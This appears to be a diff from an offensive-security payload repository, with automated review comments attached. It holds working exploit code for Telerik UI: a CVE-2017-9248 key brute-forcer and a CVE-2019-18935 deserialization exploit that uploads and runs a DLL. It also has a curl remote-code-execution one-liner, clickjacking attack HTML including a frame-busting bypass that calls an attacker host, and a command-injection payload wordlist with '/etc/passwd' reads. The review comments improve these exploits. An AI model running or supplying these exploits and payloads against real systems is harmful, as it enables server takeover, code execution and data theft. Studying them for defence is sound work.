'2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',
'2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',
'2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',
'2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118',
'2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',
'2017.3.913'
]
plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'
plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='
plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
plaintext3 = ';AllowMultipleSelection,False,3,False'
if len(args.version) > 0:
versions = [args.version]
for version in versions:
plaintext2_raw2 = version
plaintext2 = base64.b64encode(
(plaintext2_raw1 +
plaintext2_raw2 +
plaintext2_raw3
).encode()
).decode()
plaintext = plaintext1 + plaintext2 + plaintext3
plaintext = base64.b64encode(
plaintext.encode()
).decode()
ciphertext = base64.b64encode(
encrypt(
plaintext,
found
).encode()
).decode()
full_url = url_path + params + ciphertext
urls[version] = full_url
found_valid_version = False
for version in urls:
url = urls[version]
request = requests.Request('GET', url)
request = request.prepare()
response = session.send(request, verify=False, proxies=getProxy(args.proxy))
if response.status_code == 500:
continue
else:
match = re.search(
"(Error Message:)(.+\n*.+)(</div>)",
response.text
)
if match is None:
print(version + ": " + url)
found_valid_version = True
break
if not found_valid_version:
print("No valid version found")
def mode_samples():
print("Samples for testing decryption and encryption functions:")
print("-d ciphertext key")
print("-e plaintext key")
print("")
print("Key:")
print("DC50EEF37087D124578FD4E205EFACBE0D9C56607ADF522D")
print("")
print("Plaintext:")
print("EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxNi4yLjUwNC40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False")
print("")
print("Ciphertext:")
print("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")
print("")
def mode_b64e():
print(base64.b64encode(args.parameter.encode()).decode())
print("")
def mode_b64d():
print(base64.b64decode(args.parameter.encode()).decode())
print("")
sys.stderr.write(
"\ndp_crypto by Paul Taylor / @bao7uo\nCVE-2017-9248 - " +
"Telerik.Web.UI.dll Cryptographic compromise\n\n"
)
p = argparse.ArgumentParser()
subparsers = p.add_subparsers()
decrypt_parser = subparsers.add_parser('d', help='Decrypt a ciphertext')
decrypt_parser.set_defaults(func=mode_decrypt)
decrypt_parser.add_argument('ciphertext', action='store', type=str, default='', help='Ciphertext to decrypt')
decrypt_parser.add_argument('key', action='store', type=str, default='', help='Key to decrypt')
encrypt_parser = subparsers.add_parser('e', help='Encrypt a plaintext')
encrypt_parser.set_defaults(func=mode_encrypt)
encrypt_parser.add_argument('plaintext', action='store', type=str, default='', help='Ciphertext to decrypt')
encrypt_parser.add_argument('key', action='store', type=str, default='', help='Key to decrypt')
brute_parser = subparsers.add_parser('k', help='Bruteforce key/generate URL')
brute_parser.set_defaults(func=mode_brutekey)
brute_parser.add_argument('-u', '--url', action='store', type=str, help='Target URL')
brute_parser.add_argument('-l', '--key-len', action='store', type=int, default=48, help='Len of the key to retrieve, OPTIONAL: default is 48')
brute_parser.add_argument('-o', '--oracle', action='store', type=str, default='Index was outside the bounds of the array.', help='The oracle text to use. OPTIONAL: default value is for english version, other languages may have other error message')
brute_parser.add_argument('-v', '--version', action='store', type=str, default='', help='OPTIONAL. Specify the version to use rather than iterating over all of them')
brute_parser.add_argument('-c', '--charset', action='store', type=str, default='hex', help='Charset used by the key, can use all, hex, or user defined. OPTIONAL: default is hex')
brute_parser.add_argument('-a', '--accuracy', action='store', type=int, default=9, help='Maximum accuracy is out of 64 where 64 is the most accurate, \
accuracy of 9 will usually suffice for a hex, but 21 or more might be needed when testing all ascii characters. Increase the accuracy argument if no valid version is found. OPTIONAL: default is 9.')
brute_parser.add_argument('-p', '--proxy', action='store', type=str, default='', help='Specify OPTIONAL proxy server, e.g. 127.0.0.1:8080')
encode_parser = subparsers.add_parser('b', help='Encode parameter to base64')
encode_parser.set_defaults(func=mode_b64e)
encode_parser.add_argument('parameter', action='store', type=str, help='Parameter to encode')
decode_parser = subparsers.add_parser('p', help='Decode base64 parameter')
decode_parser.set_defaults(func=mode_b64d)
decode_parser.add_argument('parameter', action='store', type=str, help='Parameter to decode')
args = p.parse_args()
if len(sys.argv) > 2:
args.func()
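Review bot: the help strings on the `e` subparser are copied from the decrypt parser, so `encrypt_parser.add_argument('plaintext', ..., help='Ciphertext to decrypt')` and the following `'key'` argument with `help='Key to decrypt'` should read 'Plaintext to encrypt' and 'Key to encrypt'. Two smaller points in the same region: `mode_samples()` is defined but no subparser calls it, so the sample key, plaintext and ciphertext are unreachable from the CLI (add a `subparsers.add_parser('s', ...)` with `set_defaults(func=mode_samples)` or drop the function); and the final `if len(sys.argv) > 2: args.func()` guard means a subcommand invoked with too few arguments exits silently, where an `else: p.print_help()` branch would tell the user what went wrong. The oracle regex `re.search("(Error Message:)(.+\n*.+)(</div>)", ...)` should be a raw string so the `\n` reaches the regex engine rather than Python's string parser; it happens to work either way here, but raw strings avoid the trap the next time an escape is added.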


@@ -0,0 +1,140 @@
#!/usr/bin/env python3
# origin : https://github.com/noperator/CVE-2019-18935
# INSTALL:
# git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
# python3 -m venv env
# source env/bin/activate
# pip3 install -r requirements.txt
# Import encryption routines.
from sys import path
path.insert(1, 'RAU_crypto')
from RAU_crypto import RAUCipher
from argparse import ArgumentParser
from json import dumps, loads
from os.path import basename, splitext
from pprint import pprint
from requests import post
from requests.packages.urllib3 import disable_warnings
from sys import stderr
from time import time
from urllib3.exceptions import InsecureRequestWarning
disable_warnings(category=InsecureRequestWarning)
def send_request(files):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0',
'Connection': 'close',
'Accept-Language': 'en-US,en;q=0.5',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Upgrade-Insecure-Requests': '1'
}
response = post(url, files=files, verify=False, headers=headers)
try:
result = loads(response.text)
result['metaData'] = loads(RAUCipher.decrypt(result['metaData']))
pprint(result)
except:
print(response.text)
def build_raupostdata(object, type):
return RAUCipher.encrypt(dumps(object)) + '&' + RAUCipher.encrypt(type)
def upload():
# Build rauPostData.
object = {
'TargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version),
'TempTargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version),
'MaxFileSize': 0,
'TimeToLive': { # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk.
'Ticks': 1440000000000,
'Days': 0,
'Hours': 40,
'Minutes': 0,
'Seconds': 0,
'Milliseconds': 0,
'TotalDays': 1.6666666666666666,
'TotalHours': 40,
'TotalMinutes': 2400,
'TotalSeconds': 144000,
'TotalMilliseconds': 144000000
},
'UseApplicationPoolImpersonation': False
}
type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
raupostdata = build_raupostdata(object, type)
with open(filename_local, 'rb') as f:
payload = f.read()
metadata = {
'TotalChunks': 1,
'ChunkIndex': 0,
'TotalFileSize': 1,
'UploadID': filename_remote # Determines remote filename on disk.
}
# Build multipart form data.
files = {
'rauPostData': (None, raupostdata),
'file': (filename_remote, payload, 'application/octet-stream'),
'fileName': (None, filename_remote),
'contentType': (None, 'application/octet-stream'),
'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'),
'metadata': (None, dumps(metadata))
}
# Send request.
print('[*] Local payload name: ', filename_local, file=stderr)
print('[*] Destination folder: ', temp_target_folder, file=stderr)
print('[*] Remote payload name:', filename_remote, file=stderr)
print(file=stderr)
send_request(files)
def deserialize():
# Build rauPostData.
object = {
'Path': 'file:///' + temp_target_folder.replace('\\', '/') + '/' + filename_remote
}
type = 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=' + net_version + ', Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'
raupostdata = build_raupostdata(object, type)
# Build multipart form data.
files = {
'rauPostData': (None, raupostdata), # Only need this now.
'': '' # One extra input is required for the page to process the request.
}
# Send request.
print('\n[*] Triggering deserialization for .NET v' + net_version + '...\n', file=stderr)
start = time()
send_request(files)
end = time()
print('\n[*] Response time:', round(end - start, 2), 'seconds', file=stderr)
if __name__ == '__main__':
parser = ArgumentParser(description='Exploit for CVE-2019-18935, a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.')
parser.add_argument('-t', dest='test_upload', action='store_true', help="just test file upload, don't exploit deserialization vuln")
parser.add_argument('-v', dest='ui_version', required=True, help='software version')
parser.add_argument('-n', dest='net_version', default='4.0.0.0', help='.NET version')
parser.add_argument('-p', dest='payload', required=True, help='mixed mode assembly DLL')
parser.add_argument('-f', dest='folder', required=True, help='destination folder on target')
parser.add_argument('-u', dest='url', required=True, help='https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau')
args = parser.parse_args()
temp_target_folder = args.folder.replace('/', '\\')
ui_version = args.ui_version
net_version = args.net_version
filename_local = args.payload
filename_remote = str(time()) + splitext(basename(filename_local))[1]
url = args.url
upload()
if not args.test_upload:
deserialize()
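Review bot: the bare `except:` in `send_request()` (after `result['metaData'] = loads(RAUCipher.decrypt(result['metaData']))`) catches everything, including `KeyboardInterrupt` and `SystemExit`, and then prints the raw body, so a ctrl-C during a slow deserialization request is swallowed; narrow it to `except (ValueError, KeyError):`, which is what a non-JSON response or a body without `metaData` actually raises. Other points: `build_raupostdata(object, type)` and the locals in `upload()` / `deserialize()` shadow the `object` and `type` builtins (rename to `obj` / `type_name`); `disable_warnings` is imported from `requests.packages.urllib3` while `InsecureRequestWarning` comes from `urllib3.exceptions`, and both should come from `urllib3` since `requests.packages` is only a compatibility shim; and `path.insert(1, 'RAU_crypto')` is relative to the working directory, so the INSTALL comment should say the script must be run from the cloned repository root (or build the path from `os.path.dirname(__file__)`). The `-u` help text `https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau` is the only place the required endpoint is documented; a one-line module docstring stating that the handler needs the `?type=rau` query string would help readers who copy just this file.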


@@ -0,0 +1 @@
curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"
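Review bot: the file is a single `curl` line with no comment naming the product, affected versions or advisory that the `routestring=ajax/render/widget_php` request with `widgetConfig[code]=echo system('id');exit;` exploits, so a reader cannot tell what they are testing against or whether a target is in scope; the other exploit files in this change carry an `# origin :` / CVE header and this one should too. `-k` disables certificate verification, which is fine for a lab but deserves a trailing comment, and `--connect-timeout 5 --max-time 15` will cut off a slow `system('id')` on a loaded target, so the timeouts are worth calling out as tunable.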

Clickjacking/README.md Normal file

@@ -0,0 +1,221 @@
# Clickjacking: Web Application Security Vulnerability
> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives,
> potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions
> as such as typing in the password, clicking on Delete my account button, liking a post, deleting a post, commenting on a blog. In other words all the actions
> that a normal user can do on a legitimate website can be done using clickjacking.
## Summary
* [Tools](#tools)
* [Methodology](#methodology)
* [UI Redressing](#ui-redressing)
* [Invisible Frames](#invisible-frames)
* [Button/Form Hijacking](#buttonform-hijacking)
* [Execution Methods](#execution-methods)
* [Preventive Measures](#preventive-measures)
* [Implement X-Frame-Options Header](#implement-x-frame-options-header)
* [Content Security Policy (CSP)](#content-security-policy-csp)
* [Disabling JavaScript](#disabling-javascript)
* [OnBeforeUnload Event](#onbeforeunload-event)
* [XSS Filter](#xss-filter)
* [IE8 XSS filter](#ie8-xss-filter)
* [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter)
* [Challenge](#challenge)
* [Practice Environments](#practice-environments)
* [Reference](#references)
## Tools
* [Burp Suite](https://portswigger.net/burp)
* [OWASP ZAP](https://github.com/zaproxy/zaproxy)
* [Clickjack](https://github.com/machine1337/clickjack)
## Methodology
### UI Redressing
UI Redressing is a Clickjacking technique where an attacker overlays a transparent UI element on top of a legitimate website or application.
The transparent UI element contains malicious content or actions that are visually hidden from the user. By manipulating the transparency and positioning of elements,
the attacker can trick the user into interacting with the hidden content, believing they are interacting with the visible interface.
* **How UI Redressing Works:**
* Overlaying Transparent Element: The attacker creates a transparent HTML element (usually a `<div>`) that covers the entire visible area of a legitimate website. This element is made transparent using CSS properties like `opacity: 0;`.
* Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it.
* Misleading User Interaction: The attacker places deceptive elements within the transparent container, such as fake buttons, links, or forms. These elements perform actions when clicked, but the user is unaware of their presence due to the overlaying transparent UI element.
* User Interaction: When the user interacts with the visible interface, they are unknowingly interacting with the hidden elements due to the transparent overlay. This interaction can lead to unintended actions or unauthorized operations.
```html
<div style="opacity: 0; position: absolute; top: 0; left: 0; height: 100%; width: 100%;">
<a href="malicious-link">Click me</a>
</div>
```
### Invisible Frames
Invisible Frames is a Clickjacking technique where attackers use hidden iframes to trick users into interacting with content from another website unknowingly.
These iframes are made invisible by setting their dimensions to zero (height: 0; width: 0;) and removing their borders (border: none;).
The content inside these invisible frames can be malicious, such as phishing forms, malware downloads, or any other harmful actions.
* **How Invisible Frames Work:**
* Hidden IFrame Creation: The attacker includes an `<iframe>` element in a webpage, setting its dimensions to zero and removing its border, making it invisible to the user.
```html
<iframe src="malicious-site" style="opacity: 0; height: 0; width: 0; border: none;"></iframe>
```
* Loading Malicious Content: The src attribute of the iframe points to a malicious website or resource controlled by the attacker. This content is loaded silently without the user's knowledge because the iframe is invisible.
* User Interaction: The attacker overlays enticing elements on top of the invisible iframe, making it seem like the user is interacting with the visible interface. For instance, the attacker might position a transparent button over the invisible iframe. When the user clicks the button, they are essentially clicking on the hidden content within the iframe.
* Unintended Actions: Since the user is unaware of the invisible iframe, their interactions can lead to unintended actions, such as submitting forms, clicking on malicious links, or even performing financial transactions without their consent.
### Button/Form Hijacking
Button/Form Hijacking is a Clickjacking technique where attackers trick users into interacting with invisible or hidden buttons/forms, leading to unintended actions on a legitimate website. By overlaying deceptive elements on top of visible buttons or forms, attackers can manipulate user interactions to perform malicious actions without the user's knowledge.
* **How Button/Form Hijacking Works:**
* Visible Interface: The attacker presents a visible button or form to the user, encouraging them to click or interact with it.
```html
<button onclick="submitForm()">Click me</button>
```
* Invisible Overlay: The attacker overlays this visible button or form with an invisible or transparent element that contains a malicious action, such as submitting a hidden form.
```html
<form action="malicious-site" method="POST" id="hidden-form" style="display: none;">
<!-- Hidden form fields -->
</form>
```
* Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage.
```html
<button onclick="submitForm()">Click me</button>
<form action="legitimate-site" method="POST" id="hidden-form">
<!-- Hidden form fields -->
</form>
<script>
function submitForm() {
document.getElementById('hidden-form').submit();
}
</script>
```
### Execution Methods
* Creating Hidden Form: The attacker creates a hidden form containing malicious input fields, targeting a vulnerable action on the victim's website. This form remains invisible to the user.
```html
<form action="malicious-site" method="POST" id="hidden-form" style="display: none;">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="action" value="transfer-funds">
</form>
```
* Overlaying Visible Element: The attacker overlays a visible element (button or form) on their malicious page, encouraging users to interact with it. When the user clicks the visible element, they unknowingly trigger the hidden form's submission.
* Example in javascript:
```js
function submitForm() {
document.getElementById('hidden-form').submit();
}
```
## Preventive Measures
### Implement X-Frame-Options Header
Implement the X-Frame-Options header with the DENY or SAMEORIGIN directive to prevent your website from being embedded within an iframe without your consent.
```apache
Header always append X-Frame-Options SAMEORIGIN
```
### Content Security Policy (CSP)
Use CSP to control the sources from which content can be loaded on your website, including scripts, styles, and frames.
Define a strong CSP policy to prevent unauthorized framing and loading of external resources.
Example in HTML meta tag:
```html
<meta http-equiv="Content-Security-Policy" content="frame-ancestors 'self';">
```
### Disabling JavaScript
* Since these type of client side protections relies on JavaScript frame busting code, if the victim has JavaScript disabled or it is possible for an attacker to disable JavaScript code, the web page will not have any protection mechanism against clickjacking.
* There are three deactivation techniques that can be used with frames:
* Restricted frames with Internet Explorer: Starting from IE6, a frame can have the "security" attribute that, if it is set to the value "restricted", ensures that JavaScript code, ActiveX controls, and re-directs to other sites do not work in the frame.
```html
<iframe src="http://target site" security="restricted"></iframe>
```
* Sandbox attribute: with HTML5 there is a new attribute called “sandbox”. It enables a set of restrictions on content loaded into the iframe. At this moment this attribute is only compatible with Chrome and Safari.
```html
<iframe src="http://target site" sandbox></iframe>
```
## OnBeforeUnload Event
* The `onBeforeUnload` event could be used to evade frame busting code. This event is called when the frame busting code wants to destroy the iframe by loading the URL in the whole web page and not only in the iframe. The handler function returns a string that is prompted to the user asking confirm if he wants to leave the page. When this string is displayed to the user is likely to cancel the navigation, defeating targets frame busting attempt.
* The attacker can use this attack by registering an unload event on the top page using the following example code:
```html
<h1>www.fictitious.site</h1>
<script>
window.onbeforeunload = function()
{
return " Do you want to leave fictitious.site?";
}
</script>
<iframe src="http://target site">
```
* The previous technique requires the user interaction but, the same result, can be achieved without prompting the user. To do this the attacker have to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting (for example every millisecond) a navigation request to a web page that responds with a _"HTTP/1.1 204 No Content"_ header.
<br>_204 page:_
```php
<?php
header("HTTP/1.1 204 No Content");
?>
```
_Attacker's Page_
```js
<script>
var prevent_bust = 0;
window.onbeforeunload = function() {
prevent_bust++;
};
setInterval(
function() {
if (prevent_bust > 0) {
prevent_bust -= 2;
window.top.location = "http://attacker.site/204.php";
}
}, 1);
</script>
<iframe src="http://target site">
```
## XSS Filter
### IE8 XSS filter
This filter has visibility into all parameters of each request and response flowing through the web browser and it compares them to a set of regular expressions in order to look for reflected XSS attempts. When the filter identifies a possible XSS attacks; it disables all inline scripts within the page, including frame busting scripts (the same thing could be done with external scripts). For this reason an attacker could induce a false positive by inserting the beginning of the frame busting script into a requests parameters.
```html
<script>
if ( top != self )
{
top.location=self.location;
}
</script>
```
Attacker View:
```html
<iframe src=”http://target site/?param=<script>if”>
```
### Chrome 4.0 XSSAuditor filter
It has a little different behaviour compared to IE8 XSS filter, in fact with this filter an attacker could deactivate a “script” by passing its code in a request parameter. This enables the framing page to specifically target a single snippet containing the frame busting code, leaving all the other codes intact.
Attacker View:
```html
<iframe src=”http://target site/?param=if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D”>
```
## Challenge
Inspect the following code:
```html
<div style="position: absolute; opacity: 0;">
<iframe src="https://legitimate-site.com/login" width="500" height="500"></iframe>
</div>
<button onclick="document.getElementsByTagName('iframe')[0].contentWindow.location='malicious-site.com';">Click me</button>
```
Determine the Clickjacking vulnerability within this code snippet. Identify how the hidden iframe is being used to exploit the user's actions when they click the button, leading them to a malicious website.
## Practice Environments
* [OWASP WebGoat](https://owasp.org/www-project-webgoat/)
* [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
## References
* [Clickjacker.io - Saurabh Banawar](https://clickjacker.io)
* [Web-Security Clickjacking - PortSwigger](https://portswigger.net/web-security/clickjacking)
* [Synopsys Clickjacking](https://www.synopsys.com/glossary/what-is-clickjacking.html#B)
* [OWASP - Gustav Rydstedt](https://owasp.org/www-community/attacks/Clickjacking)
* [SecTheory](http://www.sectheory.com/clickjacking.htm)
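Review bot: the CSP example under `### Content Security Policy (CSP)` delivers `frame-ancestors` through `<meta http-equiv="Content-Security-Policy" content="frame-ancestors 'self';">`, but the CSP specification says `frame-ancestors` is ignored when the policy is set via a `<meta>` element; it only takes effect as an HTTP response header (`Content-Security-Policy: frame-ancestors 'self'`), so the example as written gives no protection and should be switched to the header form, with a sentence noting that `frame-ancestors` takes precedence over `X-Frame-Options` in browsers that support it. In the Apache snippet, `Header always append X-Frame-Options SAMEORIGIN` will emit `X-Frame-Options: DENY, SAMEORIGIN` if another layer already sets the header, which is not a valid value and is handled inconsistently by browsers; use `Header always set X-Frame-Options SAMEORIGIN`. Structurally, `## OnBeforeUnload Event`, `## XSS Filter` and `### Disabling JavaScript` describe ways to defeat JavaScript frame busting, not defences, yet the Summary nests them under `[Preventive Measures]`; move them under a heading such as `## Frame Busting Bypasses` so the TOC matches the body, and change `[Reference](#references)` to `[References](#references)` to match the heading text. Smaller fixes: the `sandbox` note "At this moment this attribute is only compatible with Chrome and Safari" is out of date (all current browsers support it) and the IE `security="restricted"` attribute is legacy-only; the `<iframe src=”http://target site/?param=<script>if”>` examples use curly quotes that break the HTML; and the `<iframe src="http://target site">` elements in the OnBeforeUnload examples lack a closing `</iframe>`.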


@@ -3,19 +3,28 @@
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt; &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt; &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
/index.html|id| /index.html|id|
";id;"
';id;'
;id; ;id;
;id ;id
;netstat -a; ;netstat -a;
;id; "|id|"
'|id|'
|id |id
|/usr/bin/id |/usr/bin/id
|id| |id|
"|/usr/bin/id|"
'|/usr/bin/id|'
|/usr/bin/id| |/usr/bin/id|
"||/usr/bin/id|"
'||/usr/bin/id|'
||/usr/bin/id| ||/usr/bin/id|
|id; |id;
||/usr/bin/id; ||/usr/bin/id;
;id| ;id|
;|/usr/bin/id| ;|/usr/bin/id|
"\n/bin/ls -al\n"
'\n/bin/ls -al\n'
\n/bin/ls -al\n \n/bin/ls -al\n
\n/usr/bin/id\n \n/usr/bin/id\n
\nid\n \nid\n
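Review bot: the added quoted variants (`";id;"`, `';id;'`, `"|id|"`, `"||/usr/bin/id|"` and the rest) are useful for breaking out of an argument the server wraps in quotes, but the `"\n/bin/ls -al\n"` and `'\n/bin/ls -al\n'` entries contain a literal backslash followed by `n` in the wordlist, exactly like the pre-existing `\n/bin/ls -al\n` line, so they only work if the intruder tool unescapes them; consider adding `%0A`-encoded twins here, as the second hunk does with `%22%0A/usr/bin/id%0A%22`, or a one-line comment at the top of the file stating that `\n` must be translated by the tool.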
@@ -56,8 +65,12 @@ a|/usr/bin/id
%0Acat%20/etc/passwd %0Acat%20/etc/passwd
%0A/usr/bin/id %0A/usr/bin/id
%0Aid %0Aid
%22%0A/usr/bin/id%0A%22
%27%0A/usr/bin/id%0A%27
%0A/usr/bin/id%0A %0A/usr/bin/id%0A
%0Aid%0A %0Aid%0A
"& ping -i 30 127.0.0.1 &"
'& ping -i 30 127.0.0.1 &'
& ping -i 30 127.0.0.1 & & ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 & & ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a %0a ping -i 30 127.0.0.1 %0a
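Review bot: the time-based probes `"& ping -i 30 127.0.0.1 &"` and `'& ping -i 30 127.0.0.1 &'` (and the unquoted line they mirror) never finish on Linux, because `-i 30` only sets the interval between packets and there is no `-c` count; whether the HTTP request returns then depends on whether the server's exec wrapper waits on the inherited stdout pipe, so the tester may get a hang rather than a measurable delay. The Windows twin `ping -n 30 127.0.0.1` does return after roughly 29 seconds. A bounded command such as `ping -c 5 127.0.0.1` (about 4 seconds) or `sleep 5` is a more reliable Linux probe, and the `-n` line should get quoted variants too so the quote-breakout coverage matches. The `%22%0A/usr/bin/id%0A%22` and `%27%0A/usr/bin/id%0A%27` additions are the right shape, since the newline is already encoded.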


@@ -8,30 +8,63 @@
* [Exploits](#exploits) * [Exploits](#exploits)
* [Basic commands](#basic-commands) * [Basic commands](#basic-commands)
* [Chaining commands](#chaining-commands) * [Chaining commands](#chaining-commands)
* [Argument injection](#argument-injection)
* [Inside a command](#inside-a-command) * [Inside a command](#inside-a-command)
* [Filter Bypasses](#filter-bypasses) * [Filter Bypasses](#filter-bypasses)
* [Bypass without space](#bypass-without-space) * [Bypass without space](#bypass-without-space)
* [Bypass with a line return](#bypass-with-a-line-return) * [Bypass with a line return](#bypass-with-a-line-return)
* [Bypass with backslash newline](#bypass-with-backslash-newline)
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
* [Bypass blacklisted words](#bypass-blacklisted-words) * [Bypass blacklisted words](#bypass-blacklisted-words)
* [Bypass with single quote](#bypass-with-a-single-quote) * [Bypass with single quote](#bypass-with-single-quote)
* [Bypass with double quote](#bypass-with-a-double-quote) * [Bypass with double quote](#bypass-with-double-quote)
* [Bypass with backticks](#bypass-with-backticks)
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash) * [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
* [Bypass with $@](#bypass-with-----) * [Bypass with $@](#bypass-with-)
* [Bypass with $()](#bypass-with--1)
* [Bypass with variable expansion](#bypass-with-variable-expansion) * [Bypass with variable expansion](#bypass-with-variable-expansion)
* [Bypass with wildcards](#bypass-with-wildcards) * [Bypass with wildcards](#bypass-with-wildcards)
* [Data Exfiltration](#data-exfiltration)
* [Time based data exfiltration](#time-based-data-exfiltration)
* [DNS based data exfiltration](#dns-based-data-exfiltration)
* [Polyglot Command Injection](#polyglot-command-injection)
* [Tricks](#tricks)
* [Backgrounding long running commands](#backgrounding-long-running-commands)
* [Remove arguments after the injection](#remove-arguments-after-the-injection)
* [Labs](#labs)
* [Challenge](#challenge) * [Challenge](#challenge)
* [Time based data exfiltration](#time-based-data-exfiltration)
* [DNS based data exfiltration](#dns-based-data-exfiltration)
* [Polyglot command injection](#polyglot-command-injection)
* [References](#references) * [References](#references)
## Tools ## Tools
* [commix - Automated All-in-One OS command injection and exploitation tool](https://github.com/commixproject/commix) * [commixproject/commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool
* [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library
## Exploits ## Exploits
Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system.
The danger of command injection is that it can allow an attacker to execute any command on the system, potentially leading to full system compromise.
**Example of Command Injection with PHP**:
Suppose you have a PHP script that takes a user input to ping a specified IP address or domain:
```php
<?php
$ip = $_GET['ip'];
system("ping -c 4 " . $ip);
?>
```
In the above code, the PHP script uses the `system()` function to execute the `ping` command with the IP address or domain provided by the user through the `ip` GET parameter.
If an attacker provides input like `8.8.8.8; cat /etc/passwd`, the actual command that gets executed would be: `ping -c 4 8.8.8.8; cat /etc/passwd`.
This means the system would first `ping 8.8.8.8` and then execute the `cat /etc/passwd` command, which would display the contents of the `/etc/passwd` file, potentially revealing sensitive information.
### Basic commands ### Basic commands
Execute the command and voila :p Execute the command and voila :p
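Review bot: the new `Exploits` introduction shows only the vulnerable form `system("ping -c 4 " . $ip);` and the `8.8.8.8; cat /etc/passwd` payload; pair it with the fixed version so the page teaches the remediation as well, for instance validating with `filter_var($ip, FILTER_VALIDATE_IP)` and wrapping the argument in `escapeshellarg($ip)` before it reaches `system()`, and note that `escapeshellarg()` on its own still lets a value beginning with `-` be parsed as an option by the target program, which is exactly what the new `Argument injection` section covers. In the TOC, the new entries `[Tricks]`, `[Backgrounding long running commands]`, `[Remove arguments after the injection]` and `[Labs]` point to sections that do not appear in this diff; please confirm those headings exist in the file, and the same for `[Challenge](#challenge)`, whose old body is removed further down. The `[Bypass with $()](#bypass-with--1)` anchor depends on GitHub's duplicate-anchor suffix and breaks if the `$@` section is ever renamed; a distinct heading wording (for example `#### Bypass with command substitution`) avoids that. The tool line reorder to `[commixproject/commix](...) - description` matches the convention used elsewhere in the repository.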
@@ -42,84 +75,191 @@ root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
...
``` ```
### Chaining commands ### Chaining commands
